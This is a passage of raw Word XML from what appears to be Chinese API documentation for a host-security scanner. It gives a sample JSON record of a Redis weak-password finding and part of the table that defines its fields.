        <w:t>": "QT052016001395",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vulName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "Redis服务存在弱密码",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "apps": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "Redis"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "desc": "Redis配置文件中</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>requirepass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>配置项为访问口令，如果配置弱口令，攻击者可通过字典快速破解该口令。攻击者连接到Redis可获取敏感信息，并根据Redis权限对服务器进行操作。如果为弱口令，攻击者可快速获取Redis访问权限，并且管理员有一定几率不会发现该爆破过程。",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>restartOpts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>publicDate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "app": "Redis",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>accountStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>weakType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "version": "3.0.6",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>binPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>redis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-server",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "password": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>unChangePwdDays</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>accountLoginType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>interactiveLoginType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwdStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "firstCheckTime":"2016-12-02 00:00:00",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "bindIp":"127.0.0.1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "port":6382,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "pid":111,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>remote":false</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>root":false</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "loginShell":1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5797CB"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2199"/>
        <w:gridCol w:w="1009"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="5329"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="2DBB307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766F25B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="636C5BF5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F10AA1C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D5AC16C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="28BDB8BE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0140069A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>vulId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1049F799" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00AC5E29" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>14)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FA50500" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>风险id（仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="03188048" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11650F4B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>vulName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D08618C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="759325A0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29176F60" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>风险名（仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="662F6B13" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DFE0BCB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76174915" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="765B8F68" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31996E76" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>影响的应用（仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="53BEB528" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="442B994F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>restartOpts</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57A54AA2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B2D0802" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="099928CB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>重启选项：0-未知；1-无需重启；2-服务重启；3系统重启 （仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="23B53D60" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5638AF53" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>publicDate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57AADD4A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50F84D6D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60BF3DDD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>发布时间（仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0F447B24" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B00498A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>app</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55121FC7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3359FDD2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E6B23AE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>弱密码应用（仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4C226DDD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5134DF01" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>uname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="745C1BC7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CA28926" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>256)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="527420FD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>用户名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="54E09620" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FDD9CF6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>accountStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53DB75DD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="254579BA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="755B9142" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>账号状态：对于windows：0-正常；1-锁定；2-禁用；对</w:t>
            </w:r>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>于</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>主机：0-禁用；1-正常）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="68251BA7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46EC1AEC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>weakType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AD1ACA5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08D918C7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B982DE3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>弱密码类型（1/2/3/4 1-空密码； 2-默认弱密码；3-跟用户名相同；4-</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>常见弱</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>密码）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="260AFFE4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72A2CCBA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A94ED76" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E66A54D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>64)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72E06837" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>应用版本号（仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="162015BF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F0795B0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>binPath</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31063BD5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57322B60" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AB6E947" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>应用路径（仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="79F20912" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67EF08C4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="583032E0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C1C95E3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>32)</w:t>
            </w:r>
